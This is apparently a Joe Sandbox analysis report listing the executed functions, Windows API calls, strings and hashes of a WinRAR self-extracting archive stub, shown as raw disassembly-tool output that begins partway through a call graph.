33573->33576 33583 dd053c 33574->33583 33577 ddbbe3 33576->33577 33589 dd04e6 SysFreeString 33577->33589 33582 ddb4c0 33579->33582 33580 de2815 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33581 ddb576 33580->33581 33581->33572 33582->33580 33584 dd0548 __EH_prolog3 33583->33584 33590 dd04fe 33584->33590 33588 dd0565 CallUnexpected 33588->33577 33589->33569 33591 de2853 16 API calls 33590->33591 33592 dd0505 33591->33592 33592->33588 33593 dd0507 17 API calls 2 library calls 33592->33593 33593->33588 33594 def900 33596 def90b 33594->33596 33595 df1317 6 API calls 33595->33596 33596->33595 33597 def934 33596->33597 33598 def930 33596->33598 33600 def960 DeleteCriticalSection 33597->33600 33600->33598 33601 dee100 33609 df1218 33601->33609 33604 dee114 33606 dee11c 33607 dee129 33606->33607 33615 dee130 6 API calls 33606->33615 33610 df1134 _unexpected 5 API calls 33609->33610 33611 df1234 33610->33611 33612 df124c TlsAlloc 33611->33612 33613 dee10a 33611->33613 33612->33613 33613->33604 33614 dedfaa 14 API calls 2 library calls 33613->33614 33614->33606 33615->33604 33616 dd2022 33617 dd2035 33616->33617 33618 dd20b5 33616->33618 33619 dc650e 41 API calls 33617->33619 33624 dd209d 33617->33624 33620 dc650e 41 API calls 33618->33620 33618->33624 33621 dd2065 33619->33621 33622 dd20ca 33620->33622 33626 dc980a IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 33621->33626 33625 dce910 88 API calls 33622->33625 33625->33624 33626->33624

                                                                              Executed Functions

                                                                              Function 00DDEC70 Relevance: 90.2, APIs: 42, Strings: 9, Instructions: 960windowfilesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __EH_prolog3_catch_GS_align.LIBCMT ref: 00DDEC7C
                                                                              • EndDialog.USER32(?,00000000), ref: 00DDED41
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDED83
                                                                              • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DDEDAB
                                                                              • IsDialogMessageW.USER32(?,?), ref: 00DDEDBE
                                                                              • TranslateMessage.USER32(?), ref: 00DDEDCC
                                                                              • DispatchMessageW.USER32(?), ref: 00DDEDD6
                                                                              • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00DDEE97
                                                                              • GetDlgItem.USER32(?,00000068), ref: 00DDEEBA
                                                                              • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DDEED8
                                                                              • SendMessageW.USER32(?,000000C2,00000000,00E012DC), ref: 00DDEEEF
                                                                              • SetFocus.USER32(00000000,?,?,STARTDLG,?,?,00000100,00000008), ref: 00DDEEFC
                                                                              • GetLastError.KERNEL32 ref: 00DDEFD6
                                                                              • GetLastError.KERNEL32 ref: 00DDF000
                                                                              • GetTickCount.KERNEL32 ref: 00DDF02E
                                                                              • GetLastError.KERNEL32(?,00000011,00000000), ref: 00DDF082
                                                                              • GetCommandLineW.KERNEL32 ref: 00DDF18E
                                                                              • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,-00000009,winrarsfxmappingfile.tmp,00000001,00000001), ref: 00DDF210
                                                                              • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 00DDF230
                                                                              • Sleep.KERNEL32(00000064), ref: 00DDF2C5
                                                                              • UnmapViewOfFile.KERNEL32(?), ref: 00DDF2FB
                                                                              • CloseHandle.KERNEL32(?), ref: 00DDF302
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDF4FD
                                                                                • Part of subcall function 00DDC5EE: GetClassNameW.USER32(?,?,00000050), ref: 00DDC60E
                                                                                • Part of subcall function 00DDC5EE: FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DDC635
                                                                                • Part of subcall function 00DDC5EE: SHAutoComplete.SHLWAPI(?,00000010), ref: 00DDC645
                                                                              • DeleteObject.GDI32(00000000), ref: 00DDF65D
                                                                              • DeleteObject.GDI32(?), ref: 00DDF69B
                                                                              • SendDlgItemMessageW.USER32(?,000000C8,00000172,00000000,00000000), ref: 00DDF6B0
                                                                              • SendMessageW.USER32(?,00000080,00000001,000304D1), ref: 00DDF6D4
                                                                              • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,00000000), ref: 00DDF6EA
                                                                              • GetDlgItem.USER32(?,00000068), ref: 00DDF6F3
                                                                              • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DDF70C
                                                                              • GetDlgItem.USER32(?,00000066), ref: 00DDF729
                                                                              • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DDF7A4
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDF7B8
                                                                              • SetForegroundWindow.USER32(?), ref: 00DDF818
                                                                              • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001FA40,00000000,00000003), ref: 00DDF85D
                                                                              • EndDialog.USER32(?,00000001), ref: 00DDF871
                                                                                • Part of subcall function 00DDFB52: __EH_prolog3_GS.LIBCMT ref: 00DDFB5C
                                                                              • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DDF9D5
                                                                              • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DDF9FA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Item$Send$Text$Dialog$ErrorFileLast$DeleteObjectViewWindow$AutoCallbackClassCloseCommandCompleteCountCreateDispatchDispatcherFindFocusForegroundH_prolog3_H_prolog3_catch_HandleLineMappingNameParamS_alignSleepTickTranslateUnmapUser
                                                                              • String ID: -el -s2 "-d%s" "-sp%s"$8($<$@$LICENSEDLG$STARTDLG$WinRAR$__tmp_rar_sfx_access_check_$winrarsfxmappingfile.tmp
                                                                              • API String ID: 3312150758-2362907701
                                                                              • Opcode ID: 2773290e73af159e661839e3d189fd15b5750adcb1ca8ee907776fc072c95e68
                                                                              • Instruction ID: e398f8a81b4eac6ca25a25f2b3e1e94fd9a6997eba9884927db783a9f471e6da
                                                                              • Opcode Fuzzy Hash: 2773290e73af159e661839e3d189fd15b5750adcb1ca8ee907776fc072c95e68
                                                                              • Instruction Fuzzy Hash: 6972EF30A00254AADB24EB60DC56FEE7B66DB51300F1840AAF546B73D3DBB50E89CB31
                                                                              Function 00DDE674 Relevance: 38.7, APIs: 17, Strings: 5, Instructions: 244filesleeptimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 572 dde674-dde719 call dd65f3 call dd1a88 call ddd16c call dc21e6 * 4 call de4480 call ddea06 call dde651 GetCommandLineW 593 dde71f-dde741 call dc1d16 call ddead5 call dc1e5c 572->593 594 dde814-dde933 call dd19a6 call dc3060 call dc1e5c call dc126f SetEnvironmentVariableW GetLocalTime call dcf858 SetEnvironmentVariableW GetModuleHandleW LoadIconW call dd28c9 call ddb83a * 2 DialogBoxParamW call ddb89a * 2 572->594 608 dde7f8-dde806 call dc1d16 call ddea58 593->608 609 dde747-dde75d OpenFileMappingW 593->609 643 dde93c-dde943 594->643 644 dde935-dde936 Sleep 594->644 621 dde80b-dde80f call dc1e5c 608->621 611 dde7ef-dde7f6 CloseHandle 609->611 612 dde763-dde773 MapViewOfFile 609->612 611->594 615 dde7ed 612->615 616 dde775-dde79e call dc8641 UnmapViewOfFile MapViewOfFile 612->616 615->611 616->611 624 dde7a0-dde7e7 call dde5e6 call ddea58 call dd4d61 call dd4c9a call dd4c17 UnmapViewOfFile 616->624 621->594 624->615 646 dde94a-dde967 call dd4bf4 DeleteObject 643->646 647 dde945 call de107a 643->647 644->643 652 dde969-dde96a DeleteObject 646->652 653 dde970-dde977 call dcdeed 646->653 647->646 652->653 656 dde979-dde97f 653->656 657 dde990-dde99f 653->657 656->657 658 dde981-dde98b call dca0ce 656->658 659 dde9a1-dde9ac call de1016 CloseHandle 657->659 660 dde9b2-dde9c0 call dcdeed 657->660 658->657 659->660 666 dde9e4-dde9e8 call ddd1cb 660->666 667 dde9c2-dde9ce 660->667 672 dde9ed-ddea03 call de2815 666->672 669 dde9de-dde9e0 667->669 670 dde9d0-dde9d8 667->670 669->666 671 dde9e2 669->671 670->666 673 dde9da-dde9dc 670->673 671->666 673->666
                                                                              APIs
                                                                                • Part of subcall function 00DD65F3: GetModuleHandleW.KERNEL32 ref: 00DD6643
                                                                                • Part of subcall function 00DD65F3: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DD6655
                                                                                • Part of subcall function 00DD65F3: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DD6676
                                                                                • Part of subcall function 00DD1A88: __EH_prolog3.LIBCMT ref: 00DD1A8F
                                                                                • Part of subcall function 00DD1A88: GetCurrentDirectoryW.KERNEL32(00000000,00000000,0000000C,00DD1636,0000007C,00DCF329), ref: 00DD1A9A
                                                                                • Part of subcall function 00DDD16C: OleInitialize.OLE32(00000000), ref: 00DDD183
                                                                                • Part of subcall function 00DDD16C: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00DDD1B5
                                                                                • Part of subcall function 00DDD16C: SHGetMalloc.SHELL32(00E097DC), ref: 00DDD1C0
                                                                              • GetCommandLineW.KERNEL32(?), ref: 00DDE70F
                                                                              • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00DDE753
                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009), ref: 00DDE769
                                                                              • UnmapViewOfFile.KERNEL32(00000000), ref: 00DDE780
                                                                              • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000009), ref: 00DDE794
                                                                                • Part of subcall function 00DDE5E6: __EH_prolog3.LIBCMT ref: 00DDE5ED
                                                                                • Part of subcall function 00DDEA58: __EH_prolog3_GS.LIBCMT ref: 00DDEA5F
                                                                                • Part of subcall function 00DDEA58: SetEnvironmentVariableW.KERNEL32(sfxcmd,00000000,00000024,00DDE80B), ref: 00DDEA71
                                                                                • Part of subcall function 00DDEA58: SetEnvironmentVariableW.KERNEL32(sfxpar,00000000,?,?,00000000,?), ref: 00DDEAC1
                                                                              • UnmapViewOfFile.KERNEL32(00000000,00E09A70,00000000,00000001,00000009), ref: 00DDE7E7
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DDE7F0
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxname,00000000,00000000), ref: 00DDE840
                                                                              • GetLocalTime.KERNEL32(?), ref: 00DDE84B
                                                                              • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00DDE89F
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00DDE8A6
                                                                              • LoadIconW.USER32(00000000,00000064), ref: 00DDE8BD
                                                                              • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,00DDEC70,00000000), ref: 00DDE905
                                                                              • Sleep.KERNEL32(00000000), ref: 00DDE936
                                                                              • DeleteObject.GDI32 ref: 00DDE95A
                                                                              • DeleteObject.GDI32(00000000), ref: 00DDE96A
                                                                                • Part of subcall function 00DDEAD5: __EH_prolog3_GS.LIBCMT ref: 00DDEADC
                                                                              • CloseHandle.KERNEL32(000000FF), ref: 00DDE9AC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$EnvironmentHandleVariableView$AddressCloseDeleteH_prolog3H_prolog3_ModuleObjectProcUnmap$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingOpenParamSleepStartupTime
                                                                              • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                                              • API String ID: 2926856693-3710569615
                                                                              • Opcode ID: 602cb34f6d36991a759f5a7a374768ca495893ba3368147fca270b602286b006
                                                                              • Instruction ID: fe1b435e23525cee51bbbf74a77651c1d39fe947d5b1bee93cffe1c4bfb9ac56
                                                                              • Opcode Fuzzy Hash: 602cb34f6d36991a759f5a7a374768ca495893ba3368147fca270b602286b006
                                                                              • Instruction Fuzzy Hash: 25918D71504341AFD720FF61DC96ABA77A8EB84700F44482FF546A7293EB749988CB72
                                                                              Function 00DDCB0A Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 720 ddcb0a-ddcb28 FindResourceW 721 ddcb2e-ddcb3f SizeofResource 720->721 722 ddcc17 720->722 721->722 724 ddcb45-ddcb54 LoadResource 721->724 723 ddcc19-ddcc1c 722->723 724->722 725 ddcb5a-ddcb65 LockResource 724->725 725->722 726 ddcb6b-ddcb7d GlobalAlloc 725->726 727 ddcc11-ddcc15 726->727 728 ddcb83-ddcb8c GlobalLock 726->728 727->723 729 ddcb8e-ddcbac call de3f00 728->729 730 ddcc0a-ddcc0b GlobalFree 728->730 734 ddcbae-ddcbcd call ddd151 729->734 735 ddcc03-ddcc04 GlobalUnlock 729->735 730->727 734->735 740 ddcbcf-ddcbd8 call ddd030 734->740 735->730 743 ddcbda-ddcbec call ddcfff call ddd00a 740->743 744 ddcbf1-ddcbff 740->744 743->744 744->735
                                                                              APIs
                                                                              • FindResourceW.KERNEL32(?,PNG), ref: 00DDCB1E
                                                                              • SizeofResource.KERNEL32(00000000,?,PNG), ref: 00DDCB35
                                                                              • LoadResource.KERNEL32(00000000,?,PNG), ref: 00DDCB4C
                                                                              • LockResource.KERNEL32(00000000,?,PNG), ref: 00DDCB5B
                                                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,?,PNG), ref: 00DDCB73
                                                                              • GlobalLock.KERNEL32(00000000), ref: 00DDCB84
                                                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000000,00000000), ref: 00DDCBA4
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 00DDCC04
                                                                                • Part of subcall function 00DDD00A: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,00000000,00000000,00000000,00DDCBF1,?,00000000), ref: 00DDD01E
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00DDCC0B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Resource$CreateLock$AllocBitmapFindFreeFromGdipLoadSizeofStreamUnlock
                                                                              • String ID: Fju0:.uPou$PNG
                                                                              • API String ID: 3656887471-3478298543
                                                                              • Opcode ID: 377d95549c311e3ad3ad8cebf6c996385593ccd8ea171a53086288505964c8d8
                                                                              • Instruction ID: bdc05438a7ebe1a24ce186a158587dbf816c394bedd9eb91fe3cdf2e16431fa5
                                                                              • Opcode Fuzzy Hash: 377d95549c311e3ad3ad8cebf6c996385593ccd8ea171a53086288505964c8d8
                                                                              • Instruction Fuzzy Hash: A631B131B21706AFDB116B65DC98A7E7AB9EF44760F08506AF905E3351EB30CD44CA70
                                                                              Function 00DDB49D Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 85comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromString.COMBASE(Shell.Explorer,?), ref: 00DDB4BA
                                                                              • CoCreateInstance.COMBASE(?,00000000,00000005,00DFB77C,?), ref: 00DDB4D1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFromInstanceString
                                                                              • String ID: @Hmu Fju0:.uPou$Shell.Explorer
                                                                              • API String ID: 432265043-3316632272
                                                                              • Opcode ID: 6e0864acb64dafbab01da4f59723b8df8734c95a76eb260630221306c4ef96e7
                                                                              • Instruction ID: 66f02c16c5c6f6a8d47cd993123f7d421c3457c5514684f15644cd40901898a8
                                                                              • Opcode Fuzzy Hash: 6e0864acb64dafbab01da4f59723b8df8734c95a76eb260630221306c4ef96e7
                                                                              • Instruction Fuzzy Hash: F9214F71B00219EFCB04EB68EC4497E77B9EF4C714B10805AEA02E7360CB60AD02CBB4
                                                                              Function 00DDBAC0 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00DDBAD8
                                                                                • Part of subcall function 00DDBB03: __EH_prolog3.LIBCMT ref: 00DDBB0A
                                                                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 00DDBAF3
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: Window$H_prolog3LongNtdllProc_
                                                                              • String ID:
                                                                              • API String ID: 130673607-0
                                                                              • Opcode ID: 4aeefa79d73f14873c1d947a5f2b8858f543f0d3d04cfa59fdca1a52c824bb0e
                                                                              • Instruction ID: 00243e73abf126fa3f2855ebc79d6152713e37a58414ff1ffe4cb6d39de9d57b
                                                                              • Opcode Fuzzy Hash: 4aeefa79d73f14873c1d947a5f2b8858f543f0d3d04cfa59fdca1a52c824bb0e
                                                                              • Instruction Fuzzy Hash: D9E0E536100119BB8F119F9AEC08CDF3F6AEF99770B058116FA19A6260C771A961DBA0
                                                                              Function 00DD65F3 Relevance: 58.1, APIs: 16, Strings: 17, Instructions: 384libraryfileloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 450 dd65f3-dd664d call de38c0 GetModuleHandleW 453 dd664f-dd665f GetProcAddress 450->453 454 dd6698-dd6901 450->454 455 dd6661-dd666e 453->455 456 dd6670-dd6680 GetProcAddress 453->456 457 dd6a29-dd6a5a call dd19a6 call dd092c 454->457 458 dd6907-dd6916 call dec55a 454->458 455->456 456->454 459 dd6682-dd6691 456->459 472 dd6a60-dd6a6c call dd011a 457->472 458->457 467 dd691c-dd694f call dd19a6 call dc126f CreateFileW 458->467 459->454 479 dd6955-dd6963 SetFilePointer 467->479 480 dd6a13-dd6a24 CloseHandle call dc1e5c 467->480 477 dd6a6e-dd6a7c call dd6d27 472->477 478 dd6aa3-dd6ae0 call dc1d16 call dd0b84 call dc1e5c call dcf2f2 472->478 477->478 488 dd6a7e-dd6aa1 CompareStringW 477->488 509 dd6ae5-dd6ae8 478->509 479->480 482 dd6969-dd6987 ReadFile 479->482 480->457 482->480 486 dd698d-dd699b 482->486 489 dd6d21-dd6d26 call de2acd 486->489 490 dd69a1-dd69d3 call dc1d16 call dc21e6 486->490 488->478 492 dd6aea-dd6afa 488->492 508 dd69e1-dd6a01 call dd5fc9 490->508 492->472 499 dd6b00 492->499 502 dd6b0a-dd6b11 499->502 503 dd6b71-dd6b73 502->503 504 dd6b13 502->504 510 dd6ced-dd6d20 call dc1e5c * 2 call de2815 503->510 511 dd6b79-dd6b8e call dd0d7c call dd011a 503->511 507 dd6b15-dd6b5a call dc1d16 call dd0b84 call dc1e5c call dcf2f2 504->507 552 dd6b5c-dd6b60 507->552 553 dd6b64-dd6b6b 507->553 521 dd69d5-dd69dc call dc126f call dd6d27 508->521 522 dd6a03-dd6a0e call dc1e5c * 2 508->522 509->492 516 dd6b02-dd6b04 509->516 532 dd6c4a-dd6c8c call dd6223 AllocConsole 511->532 533 dd6b94-dd6c45 call dd6d27 * 2 call dd4055 call dd6223 call dd4055 call dc1d16 call ddcace call dc1e5c 511->533 516->502 521->508 522->480 547 dd6c8e-dd6cd4 GetCurrentProcessId AttachConsole call dc1891 call dc126f GetStdHandle WriteConsoleW Sleep FreeConsole 532->547 548 dd6cda-dd6ce7 call dc1e5c ExitProcess 532->548 533->548 547->548 552->507 557 dd6b62 552->557 553->503 557->503
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32 ref: 00DD6643
                                                                              • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00DD6655
                                                                              • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00DD6676
                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DD6944
                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00DD695B
                                                                              • ReadFile.KERNEL32(00000000,?,00007FFE,?,00000000), ref: 00DD697F
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00DD6A14
                                                                              • CompareStringW.KERNEL32(00000400,00001001,00E01C30,000000FF,DXGIDebug.dll,000000FF), ref: 00DD6A98
                                                                                • Part of subcall function 00DD6D27: __EH_prolog3_GS.LIBCMT ref: 00DD6D2E
                                                                                • Part of subcall function 00DD6D27: GetSystemDirectoryW.KERNEL32(00000000), ref: 00DD6D59
                                                                                • Part of subcall function 00DD6D27: LoadLibraryW.KERNEL32(00000000,00DD4B85,?,00000104,?,0000005C,00DD4B85,00000000,00DD4D83,00000000,?,?,?,?,00DD4C55,?), ref: 00DD6DB9
                                                                                • Part of subcall function 00DCF2F2: __EH_prolog3_GS.LIBCMT ref: 00DCF2F9
                                                                                • Part of subcall function 00DCF2F2: GetFileAttributesW.KERNEL32(00000000,0000001C,00DCF2CA,?,00DCA3FB), ref: 00DCF306
                                                                                • Part of subcall function 00DCF2F2: GetFileAttributesW.KERNEL32(00000000), ref: 00DCF336
                                                                              • AllocConsole.KERNEL32 ref: 00DD6C84
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00DD6C8E
                                                                              • AttachConsole.KERNEL32(00000000), ref: 00DD6C95
                                                                              • GetStdHandle.KERNEL32(000000F4), ref: 00DD6CB1
                                                                              • WriteConsoleW.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00DD6CC3
                                                                              • Sleep.KERNEL32(00002710), ref: 00DD6CCE
                                                                              • FreeConsole.KERNEL32 ref: 00DD6CD4
                                                                              • ExitProcess.KERNEL32 ref: 00DD6CE7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.1890085406.0000000000DC1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00DC0000, based on PE: true
                                                                              • Associated: 00000008.00000002.1890064100.0000000000DC0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E08000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890151298.0000000000E0C000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                              • Associated: 00000008.00000002.1890221221.0000000000E14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_dc0000_UNK_.jbxd
                                                                              Similarity
                                                                              • API ID: File$Console$Handle$AddressAttributesH_prolog3_ProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemWrite
                                                                              • String ID: 0 $4!$@ $DXGIDebug.dll$P!$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$X $dwmapi.dll$h!$kernel32$p $uxtheme.dll$xlistpos$ $!
                                                                              • API String ID: 1861777435-2344324139
                                                                              • Opcode ID: 29782bb5c187e1d6885f8a55ce2e88d6fa1b9fe034e65fe2f2ce113e9d426c00
                                                                              • Instruction ID: 61cb631c0948868acc13e2a06c32f632af1fd394f4106c364b59fb8789dc0d58
                                                                              • Opcode Fuzzy Hash: 29782bb5c187e1d6885f8a55ce2e88d6fa1b9fe034e65fe2f2ce113e9d426c00
                                                                              • Instruction Fuzzy Hash: 8C027F708006299ADB64DF50CC4AADDB7B8FF45314F1091DAE689BB281DF705ACACF64
                                                                              Function 00DDB8F1 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 676 ddb8f1-ddb931 ShowWindow call ddba59 679 ddb93c-ddb93e 676->679 680 ddb933-ddb93b call deba9e 676->680 682 ddb944-ddb94a call dec5a4 679->682 683 ddb940-ddb942 679->683 680->679 685 ddb94b-ddb979 GetWindowRect GetParent MapWindowPoints 682->685 683->685 688 ddb97b-ddb97e DestroyWindow 685->688 689 ddb984-ddb9cf GetParent CreateWindowExW 685->689 688->689 690 ddb9d1-ddb9d4 689->690 691 ddba10-ddba12 689->691 690->691 692 ddb9d6-ddb9dc 690->692 693 ddba14-ddba20 ShowWindow UpdateWindow 691->693 694 ddba26-ddba38 call de2815 691->694 692->694 695 ddb9de-ddb9e1 692->695 693->694 695->694 697 ddb9e3-ddb9e6 695->697 697->694 699 ddb9e8-ddb9f4 call ddbf19 697->699 699->694 702 ddb9f6-ddba0e ShowWindow SetWindowTextW call deba9e 699->702 702->694
                                                                              APIs
                                                                              • ShowWindow.USER32 ref: 00DDB91F
                                                                                • Part of subcall function 00DDBA59: LoadCursorW.USER32(00000000,00007F00), ref: 00DDBA90
                                                                                • Part of subcall function 00DDBA59: RegisterClassExW.USER32(00000030), ref: 00DDBAB1
                                                                              • GetWindowRect.USER32(?,00000000), ref: 00DDB958
                                                                              • GetParent.USER32(?), ref: 00DDB966
                                                                              • MapWindowPoints.USER32(00000000,00000000), ref: 00DDB96F
                                                                              • DestroyWindow.USER32(00000000), ref: 00DDB97E
                                                                              • GetParent.USER32(?), ref: 00DDB99B
                                                                              • CreateWindowExW.USER32(00000000,RarHtmlClassName,00000000,40000000,00000001,?,?,?,00000000,00000000,?,00000000), ref: 00DDB9C2
                                                                              • ShowWindow.USER32(?,00000005,00000000), ref: 00DDB9F9
